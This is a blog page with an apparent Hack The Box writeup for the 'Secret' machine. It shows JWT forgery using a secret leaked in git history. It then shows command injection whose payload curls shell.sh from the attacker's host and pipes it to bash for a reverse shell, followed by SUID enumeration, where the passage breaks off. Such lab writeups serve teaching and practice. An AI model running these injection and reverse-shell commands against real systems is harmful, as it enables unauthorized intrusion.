<!DOCTYPE html><html lang="en" data-mode="dark" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="generator" content="Jekyll v4.2.2" /><meta property="og:title" content="Secret writeup" /><meta property="og:locale" content="en" /><meta name="description" content="Summary This box focused on exploiting an API via command injection after first forging a valid admin JWT. Once a foothold had been established, we could read the root ssh-key via a SUID binary before dumping the memory of the program, allowing us to read the loaded ssh-key from memory. Foothold We start out by doing an nmap port scan:" /><meta property="og:description" content="Summary This box focused on exploiting an API via command injection after first forging a valid admin JWT. Once a foothold had been established, we could read the root ssh-key via a SUID binary before dumping the memory of the program, allowing us to read the loaded ssh-key from memory. Foothold We start out by doing an nmap port scan:" /><link rel="canonical" href="https://bitisg.github.io/posts/Secret/" /><meta property="og:url" content="https://bitisg.github.io/posts/Secret/" /><meta property="og:site_name" content="BitisGabonica" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2022-07-09T15:00:00+02:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="Secret writeup" /><meta name="twitter:site" content="@BitisGabonica1" /> <script type="application/ld+json"> {"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2022-07-09T15:00:00+02:00","datePublished":"2022-07-09T15:00:00+02:00","description":"Summary This box focused on exploiting an API via command injection after first forging a valid admin JWT. Once a foothold had been established, we could read the root ssh-key via a SUID binary before dumping the memory of the program, allowing us to read the loaded ssh-key from memory. Foothold We start out by doing an nmap port scan:","headline":"Secret writeup","mainEntityOfPage":{"@type":"WebPage","@id":"https://bitisg.github.io/posts/Secret/"},"url":"https://bitisg.github.io/posts/Secret/"}</script><title>Secret writeup | BitisGabonica</title><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/site.webmanifest"><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico"><meta name="apple-mobile-web-app-title" content="BitisGabonica"><meta name="application-name" content="BitisGabonica"><meta name="msapplication-TileColor" content="#da532c"><meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link rel="dns-prefetch" href="https://fonts.gstatic.com" crossorigin><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://cdn.jsdelivr.net" ><link rel="dns-prefetch" href="https://cdn.jsdelivr.net" ><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato&family=Source+Sans+Pro:wght@400;600;700;900&display=swap"><link rel="preconnect" href="https://www.google-analytics.com" crossorigin="use-credentials"><link rel="dns-prefetch" href="https://www.google-analytics.com"><link rel="preconnect" href="https://www.googletagmanager.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://www.googletagmanager.com"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css"><link rel="stylesheet" href="/assets/css/style.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1/dist/magnific-popup.min.css"> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script><body data-spy="scroll" data-target="#toc" data-topbar-visible="true"><div id="sidebar" class="d-flex flex-column align-items-end"><div class="profile-wrapper text-center"><div id="avatar"> <a href="/" alt="avatar" class="mx-auto"> <img src=" /assets/img/sui.png " alt="avatar" onerror="this.style.display='none'"> </a></div><div class="site-title mt-3"> <a href="/">BitisGabonica</a></div><div class="site-subtitle font-italic">CTF writeups and other stuff</div></div><ul class="w-100"><li class="nav-item"> <a href="/" class="nav-link"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/categories/" class="nav-link"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a><li class="nav-item"> <a href="/tags/" class="nav-link"> <i class="fa-fw fas fa-tag ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a><li class="nav-item"> <a href="/archives/" class="nav-link"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a><li class="nav-item"> <a href="/about/" class="nav-link"> <i class="fa-fw fas fa-info-circle ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></ul><div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center align-items-center"> <a href="https://github.com/BitisG" aria-label="github" target="_blank" rel="noopener"> <i class="fab fa-github"></i> </a> <a href="https://twitter.com/BitisGabonica1" aria-label="twitter" target="_blank" rel="noopener"> <i class="fab fa-twitter"></i> </a> <a href=" javascript:location.href = 'mailto:' + ['0xBitisGabonica','protonmail.com'].join('@')" aria-label="email" > <i class="fas fa-envelope"></i> </a> <a href="/feed.xml" aria-label="rss" > <i class="fas fa-rss"></i> </a></div></div><div id="topbar-wrapper" class="row justify-content-center"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Home </a> </span> <span>Secret writeup</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" autocomplete="off" placeholder="Search..."> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"><div class="row"><div id="core-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"> <img src="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 1000 400'%3E%3C/svg%3E" data-src="/assets/img/boxes/secret/Secret.png" class="preview-img bg" alt="Preview Image" width="1000" height="400" data-proofer-ignore><h1 data-toc-skip>Secret writeup</h1><div class="post-meta text-muted"><div> By <em> <a href="https://twitter.com/BitisGabonica1">BitisGabonica</a> </em></div><div class="d-flex"><div> <span> Posted <em class="timeago" data-ts="1657371600" data-toggle="tooltip" data-placement="bottom" data-tooltip-df="llll" > 2022-07-09 </em> </span> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="1886 words"> <em>10 min</em> read</span></div></div></div><div class="post-content"><h2 id="summary"><span class="mr-2">Summary</span><a href="#summary" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2></h2><p>This box focused on exploiting an API via command injection after first forging a valid admin JWT. Once a foothold had been established, we could read the root ssh-key via a SUID binary before dumping the memory of the program, allowing us to read the loaded ssh-key from memory.</p><h2 id="foothold"><span class="mr-2">Foothold</span><a href="#foothold" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2></h2><p>We start out by doing an nmap port scan:</p><div class="language-console highlighter-rouge"><div class="code-header"> <span data-label-text="Console"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
</pre><td class="rouge-code"><pre><span class="go">Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-06 10:21 EDT
Nmap scan report for 10.129.252.4
Host is up (0.081s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
</span><span class="gp">22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux;</span><span class="w"> </span>protocol 2.0<span class="o">)</span>
<span class="go">| ssh-hostkey: 
|   3072 97:af:61:44:10:89:b9:53:f0:80:3f:d7:19:b1:e2:9c (RSA)
|   256 95:ed:65:8d:cd:08:2b:55:dd:17:51:31:1e:3e:18:12 (ECDSA)
|_  256 33:7b:c1:71:d3:33:0f:92:4e:83:5a:1f:52:02:93:5e (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: DUMB Docs
3000/tcp open  http    Node.js (Express middleware)
|_http-title: DUMB Docs
</span><span class="gp">Service Info: OS: Linux;</span><span class="w"> </span>CPE: cpe:/o:linux:linux_kernel
<span class="go">
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.75 seconds
</span></pre></table></code></div></div><p>3 ports are open, port 22, 80 and 3000. The last two seem to be hosting the same application, since if we attempt to visit them via our browser we see the same documentation page <img data-src="/assets/img/boxes/secret/welcome.png" alt="" data-proofer-ignore> We can also download the source to their API on this page. Doing this we can find a file named <code class="language-plaintext highlighter-rouge">forgot.js</code>:</p><div class="language-js highlighter-rouge"><div class="code-header"> <span data-label-text="JavaScript"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
</pre><td class="rouge-code"><pre><span class="kd">const</span> <span class="nx">router</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="dl">'</span><span class="s1">express</span><span class="dl">'</span><span class="p">).</span><span class="nx">Router</span><span class="p">();</span>
<span class="kd">const</span> <span class="nx">verifytoken</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="dl">'</span><span class="s1">./verifytoken</span><span class="dl">'</span><span class="p">)</span>
<span class="kd">const</span> <span class="nx">User</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="dl">'</span><span class="s1">../model/user</span><span class="dl">'</span><span class="p">);</span>

<span class="nx">router</span><span class="p">.</span><span class="kd">get</span><span class="p">(</span><span class="dl">'</span><span class="s1">/priv</span><span class="dl">'</span><span class="p">,</span> <span class="nx">verifytoken</span><span class="p">,</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span>
    <span class="c1">// res.send(req.user)</span>

    <span class="kd">const</span> <span class="nx">userinfo</span> <span class="o">=</span> <span class="p">{</span> <span class="na">name</span><span class="p">:</span> <span class="nx">req</span><span class="p">.</span><span class="nx">user</span> <span class="p">}</span>

    <span class="kd">const</span> <span class="nx">name</span> <span class="o">=</span> <span class="nx">userinfo</span><span class="p">.</span><span class="nx">name</span><span class="p">.</span><span class="nx">name</span><span class="p">;</span>

    <span class="k">if</span> <span class="p">(</span><span class="nx">name</span> <span class="o">==</span> <span class="dl">'</span><span class="s1">theadmin</span><span class="dl">'</span><span class="p">)</span> <span class="p">{</span>
        <span class="nx">res</span><span class="p">.</span><span class="nx">json</span><span class="p">({</span>
            <span class="na">role</span><span class="p">:</span> <span class="p">{</span>
                <span class="na">role</span><span class="p">:</span> <span class="dl">"</span><span class="s2">you are admin</span><span class="dl">"</span><span class="p">,</span>
                <span class="na">desc</span><span class="p">:</span> <span class="dl">"</span><span class="s2">{path to the binary}</span><span class="dl">"</span>
            <span class="p">}</span>
        <span class="p">})</span>
    <span class="p">}</span>
    <span class="k">else</span> <span class="p">{</span>
        <span class="nx">res</span><span class="p">.</span><span class="nx">json</span><span class="p">({</span>
            <span class="na">role</span><span class="p">:</span> <span class="p">{</span>
                <span class="na">role</span><span class="p">:</span> <span class="dl">"</span><span class="s2">not enough privilages</span><span class="dl">"</span><span class="p">,</span>
                <span class="na">desc</span><span class="p">:</span> <span class="nx">userinfo</span><span class="p">.</span><span class="nx">name</span><span class="p">.</span><span class="nx">name</span>
            <span class="p">}</span>
        <span class="p">})</span>
    <span class="p">}</span>

<span class="p">})</span>


<span class="nx">module</span><span class="p">.</span><span class="nx">exports</span> <span class="o">=</span> <span class="nx">router</span> 
</pre></table></code></div></div><p>We can also create our own user via curl:</p><div class="language-console highlighter-rouge"><div class="code-header"> <span data-label-text="Console"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre><span class="go">┌──(bitis㉿workstation)-[~/…/Machines/Secret/local-web/routes]
</span><span class="gp">└─$</span><span class="w"> </span>curl <span class="nt">-X</span> POST <span class="nt">-d</span> <span class="s1">'{"name": "user123", "email": "test@test.com", "password": "password123"}'</span> <span class="nt">-H</span> <span class="s1">'Content-Type: application/json'</span> http://10.129.77.29:3000/api/user/register
<span class="go">{"user":"user123"}        
</span></pre></table></code></div></div><p>We can then login using the API as well. Doing this we recieve a JWT.</p><div class="language-console highlighter-rouge"><div class="code-header"> <span data-label-text="Console"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre><span class="go">┌──(bitis㉿workstation)-[~/…/Machines/Secret/local-web/routes]
</span><span class="gp">└─$</span><span class="w"> </span>curl <span class="nt">-X</span> POST <span class="nt">-d</span> <span class="s1">'{ "email": "test@test.com", "password": "password123"}'</span> <span class="nt">-H</span> <span class="s1">'Content-Type: application/json'</span> http://10.129.77.29:3000/api/user/login   
<span class="go">eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MmM5ZDllMGRmMjgwZDA0N2FiNmIwNWMiLCJuYW1lIjoidXNlcjEyMyIsImVtYWlsIjoidGVzdEB0ZXN0LmNvbSIsImlhdCI6MTY1NzM5NTc3NH0.PBkFSFO_coZUXV3tPaIXjN9n_XC8N8Kb0T_vohL3uNY
</span></pre></table></code></div></div><p>We can then use <a href="https://jwt.io/">jwt.io</a> to decode the JWT. <img data-src="/assets/img/boxes/secret/JWT_test.png" alt="" data-proofer-ignore> It would be extremely cool and very useful if we could just make our own valid tokens, however this requires that we know the secret used to sign the tokens. Luckily, the source code we downloaded earlier is actually is a <code class="language-plaintext highlighter-rouge">git</code> repository. We can then use <code class="language-plaintext highlighter-rouge">git log</code> and <code class="language-plaintext highlighter-rouge">git diff</code> to check for differences between commits. Doing this we find what seems to be the JWT secret:</p><div class="language-console highlighter-rouge"><div class="code-header"> <span data-label-text="Console"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre><td class="rouge-code"><pre><span class="go">diff --git a/.env b/.env
index fb6f587..31db370 100644
--- a/.env
+++ b/.env
@@ -1,2 +1,2 @@
 DB_CONNECT = 'mongodb://127.0.0.1:27017/auth-web'
-TOKEN_SECRET = gXr67TtoQL8TShUc8XYsK2HvsBYfyQSFCFZe4MQp7gRpFuMkKjcM72CNQN4fMfbZEKx4i7YiWuNAkmuTcdEriCMm9vPAYkhpwPTiuVwVhvwE
+TOKEN_SECRET = secret
</span></pre></table></code></div></div><p>We can then create a JWT for a user with the name <code class="language-plaintext highlighter-rouge">theadmin</code>. <img data-src="/assets/img/boxes/secret/admin_JWT.png" alt="" data-proofer-ignore> We then see that we have successfully impersonated the admin:</p><div class="language-console highlighter-rouge"><div class="code-header"> <span data-label-text="Console"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre><span class="go">┌──(bitis㉿workstation)-[~/htb/Machines/Secret/local-web]
</span><span class="gp">└─$</span><span class="w"> </span>curl <span class="nt">-X</span> GET <span class="nt">-H</span> <span class="s1">'auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MmM5ZDllMGRmMjgwZDA0N2FiNmIwNWMiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6InRlc3RAdGVzdC5jb20iLCJpYXQiOjE2NTczOTU3NzR9.0l8x-px0y5ok5cvMuj1IC0qzw6p1Oc6J-zfHVlzG16A'</span> http://10.129.77.29:3000/api/priv
<span class="go">{"creds":{"role":"admin","username":"theadmin","desc":"welcome back admin"}}
</span></pre></table></code></div></div><p>If we take a look at <code class="language-plaintext highlighter-rouge">private.js</code> we find some API functionality that only the admin should have access to:</p><div class="language-js highlighter-rouge"><div class="code-header"> <span data-label-text="JavaScript"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
</pre><td class="rouge-code"><pre><span class="kd">const</span> <span class="nx">router</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="dl">'</span><span class="s1">express</span><span class="dl">'</span><span class="p">).</span><span class="nx">Router</span><span class="p">();</span>
<span class="kd">const</span> <span class="nx">verifytoken</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="dl">'</span><span class="s1">./verifytoken</span><span class="dl">'</span><span class="p">)</span>
<span class="kd">const</span> <span class="nx">User</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="dl">'</span><span class="s1">../model/user</span><span class="dl">'</span><span class="p">);</span>

<span class="nx">router</span><span class="p">.</span><span class="kd">get</span><span class="p">(</span><span class="dl">'</span><span class="s1">/priv</span><span class="dl">'</span><span class="p">,</span> <span class="nx">verifytoken</span><span class="p">,</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span>
   <span class="c1">// res.send(req.user)</span>

    <span class="kd">const</span> <span class="nx">userinfo</span> <span class="o">=</span> <span class="p">{</span> <span class="na">name</span><span class="p">:</span> <span class="nx">req</span><span class="p">.</span><span class="nx">user</span> <span class="p">}</span>

    <span class="kd">const</span> <span class="nx">name</span> <span class="o">=</span> <span class="nx">userinfo</span><span class="p">.</span><span class="nx">name</span><span class="p">.</span><span class="nx">name</span><span class="p">;</span>
    
    <span class="k">if</span> <span class="p">(</span><span class="nx">name</span> <span class="o">==</span> <span class="dl">'</span><span class="s1">theadmin</span><span class="dl">'</span><span class="p">){</span>
        <span class="nx">res</span><span class="p">.</span><span class="nx">json</span><span class="p">({</span>
            <span class="na">creds</span><span class="p">:{</span>
                <span class="na">role</span><span class="p">:</span><span class="dl">"</span><span class="s2">admin</span><span class="dl">"</span><span class="p">,</span> 
                <span class="na">username</span><span class="p">:</span><span class="dl">"</span><span class="s2">theadmin</span><span class="dl">"</span><span class="p">,</span>
                <span class="na">desc</span> <span class="p">:</span> <span class="dl">"</span><span class="s2">welcome back admin,</span><span class="dl">"</span>
            <span class="p">}</span>
        <span class="p">})</span>
    <span class="p">}</span>
    <span class="k">else</span><span class="p">{</span>
        <span class="nx">res</span><span class="p">.</span><span class="nx">json</span><span class="p">({</span>
            <span class="na">role</span><span class="p">:</span> <span class="p">{</span>
                <span class="na">role</span><span class="p">:</span> <span class="dl">"</span><span class="s2">you are normal user</span><span class="dl">"</span><span class="p">,</span>
                <span class="na">desc</span><span class="p">:</span> <span class="nx">userinfo</span><span class="p">.</span><span class="nx">name</span><span class="p">.</span><span class="nx">name</span>
            <span class="p">}</span>
        <span class="p">})</span>
    <span class="p">}</span>
<span class="p">})</span>


<span class="nx">router</span><span class="p">.</span><span class="kd">get</span><span class="p">(</span><span class="dl">'</span><span class="s1">/logs</span><span class="dl">'</span><span class="p">,</span> <span class="nx">verifytoken</span><span class="p">,</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span>
    <span class="kd">const</span> <span class="nx">file</span> <span class="o">=</span> <span class="nx">req</span><span class="p">.</span><span class="nx">query</span><span class="p">.</span><span class="nx">file</span><span class="p">;</span>
    <span class="kd">const</span> <span class="nx">userinfo</span> <span class="o">=</span> <span class="p">{</span> <span class="na">name</span><span class="p">:</span> <span class="nx">req</span><span class="p">.</span><span class="nx">user</span> <span class="p">}</span>
    <span class="kd">const</span> <span class="nx">name</span> <span class="o">=</span> <span class="nx">userinfo</span><span class="p">.</span><span class="nx">name</span><span class="p">.</span><span class="nx">name</span><span class="p">;</span>
    
    <span class="k">if</span> <span class="p">(</span><span class="nx">name</span> <span class="o">==</span> <span class="dl">'</span><span class="s1">theadmin</span><span class="dl">'</span><span class="p">){</span>
        <span class="kd">const</span> <span class="nx">getLogs</span> <span class="o">=</span> <span class="s2">`git log --oneline </span><span class="p">${</span><span class="nx">file</span><span class="p">}</span><span class="s2">`</span><span class="p">;</span>
        <span class="nx">exec</span><span class="p">(</span><span class="nx">getLogs</span><span class="p">,</span> <span class="p">(</span><span class="nx">err</span> <span class="p">,</span> <span class="nx">output</span><span class="p">)</span> <span class="o">=&gt;</span><span class="p">{</span>
            <span class="k">if</span><span class="p">(</span><span class="nx">err</span><span class="p">){</span>
                <span class="nx">res</span><span class="p">.</span><span class="nx">status</span><span class="p">(</span><span class="mi">500</span><span class="p">).</span><span class="nx">send</span><span class="p">(</span><span class="nx">err</span><span class="p">);</span>
                <span class="k">return</span>
            <span class="p">}</span>
            <span class="nx">res</span><span class="p">.</span><span class="nx">json</span><span class="p">(</span><span class="nx">output</span><span class="p">);</span>
        <span class="p">})</span>
    <span class="p">}</span>
    <span class="k">else</span><span class="p">{</span>
        <span class="nx">res</span><span class="p">.</span><span class="nx">json</span><span class="p">({</span>
            <span class="na">role</span><span class="p">:</span> <span class="p">{</span>
                <span class="na">role</span><span class="p">:</span> <span class="dl">"</span><span class="s2">you are normal user</span><span class="dl">"</span><span class="p">,</span>
                <span class="na">desc</span><span class="p">:</span> <span class="nx">userinfo</span><span class="p">.</span><span class="nx">name</span><span class="p">.</span><span class="nx">name</span>
            <span class="p">}</span>
        <span class="p">})</span>
    <span class="p">}</span>
<span class="p">})</span>

<span class="nx">router</span><span class="p">.</span><span class="nx">use</span><span class="p">(</span><span class="kd">function</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">,</span> <span class="nx">next</span><span class="p">)</span> <span class="p">{</span>
    <span class="nx">res</span><span class="p">.</span><span class="nx">json</span><span class="p">({</span>
        <span class="na">message</span><span class="p">:</span> <span class="p">{</span>

            <span class="na">message</span><span class="p">:</span> <span class="dl">"</span><span class="s2">404 page not found</span><span class="dl">"</span><span class="p">,</span>
            <span class="na">desc</span><span class="p">:</span> <span class="dl">"</span><span class="s2">page you are looking for is not found. </span><span class="dl">"</span>
        <span class="p">}</span>
    <span class="p">})</span>
<span class="p">});</span>


<span class="nx">module</span><span class="p">.</span><span class="nx">exports</span> <span class="o">=</span> <span class="nx">router</span>
</pre></table></code></div></div><p>It seems that at the <code class="language-plaintext highlighter-rouge">/logs</code> endpoint, the api is executing the command <code class="language-plaintext highlighter-rouge">git log --oneline ${file}</code>, however it doesn’t seem to validate the input it takes from the user in any way. We can exploit this by hosting a bash revshell on our system, then giving the API the command to get the revshell and pipe it to bash:</p><p><code class="language-plaintext highlighter-rouge">curl -H 'auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MmM5ZDllMGRmMjgwZDA0N2FiNmIwNWMiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6InRlc3RAdGVzdC5jb20iLCJpYXQiOjE2NTczOTU3NzR9.0l8x-px0y5ok5cvMuj1IC0qzw6p1Oc6J-zfHVlzG16A' 'http://10.129.77.29:3000/api/logs?file=test;curl+http://10.10.14.81:8000/shell.sh+|+bash'</code></p><p>This then gives us a revshell on the host system.</p><div class="language-console highlighter-rouge"><div class="code-header"> <span data-label-text="Console"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre><td class="rouge-code"><pre><span class="go">┌──(bitis㉿workstation)-[~]
</span><span class="gp">└─$</span><span class="w"> </span>nc <span class="nt">-lvnp</span> 1234             
<span class="go">listening on [any] 1234 ...
connect to [10.10.14.81] from (UNKNOWN) [10.129.77.29] 48066
bash: cannot set terminal process group (1146): Inappropriate ioctl for device
bash: no job control in this shell
</span><span class="gp">dasith@secret:~/local-web$</span><span class="w"> </span><span class="nb">cd</span> ~
<span class="go">cd ~
</span><span class="gp">dasith@secret:~$</span><span class="w"> </span><span class="nb">cat </span>user.txt
<span class="go">cat user.txt
d90be9c3f2f7248df5a7cfc39b4324b5
</span><span class="gp">dasith@secret:~$</span><span class="w"> 
</span></pre></table></code></div></div><h2 id="privilege-escalation"><span class="mr-2">Privilege escalation</span><a href="#privilege-escalation" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2></h2><p>We start by taking a look at SUID binaries:</p><div class="language-console highlighter-rouge"><div class="code-header"> <span data-label-text="Console"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
</pre><td class="rouge-code"><pre><span class="gp">dasith@secret:~$</span><span class="w"> </span>find / <span class="nt">-perm</span> <span class="nt">-4000</span> 2&gt;/dev/null
<span class="gp">find / -perm -4000 2&gt;</span>/dev/null
<span class="go">/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/fusermount
/usr/bin/umount
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/opt/count
/snap/snapd/13640/usr/lib/snapd/snap-confine
/snap/snapd/13170/usr/lib/snapd/snap-confine
/snap/core20/1169/usr/bin/chfn
/snap/core20/1169/usr/bin/chsh
/snap/core20/1169/usr/bin/gpasswd
---SNIP---
</span></pre></table></code></div></div><p>The binary located at <code class="language-plaintext highlighter-rouge">/opt/count</code> seems out of place, let’s take a look:</p><div class="language-c highlighter-rouge"><div class="code-header"> <span data-label-text="C"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
</pre><td class="rouge-code"><pre><span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;string.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;dirent.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/prctl.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/types.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/stat.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;linux/limits.h&gt;</span><span class="cp">
</span>
<span class="kt">void</span> <span class="nf">dircount</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">path</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">summary</span><span class="p">)</span>
<span class="p">{</span>
    <span class="kt">DIR</span> <span class="o">*</span><span class="n">dir</span><span class="p">;</span>
    <span class="kt">char</span> <span class="n">fullpath</span><span class="p">[</span><span class="n">PATH_MAX</span><span class="p">];</span>
    <span class="k">struct</span> <span class="n">dirent</span> <span class="o">*</span><span class="n">ent</span><span class="p">;</span>
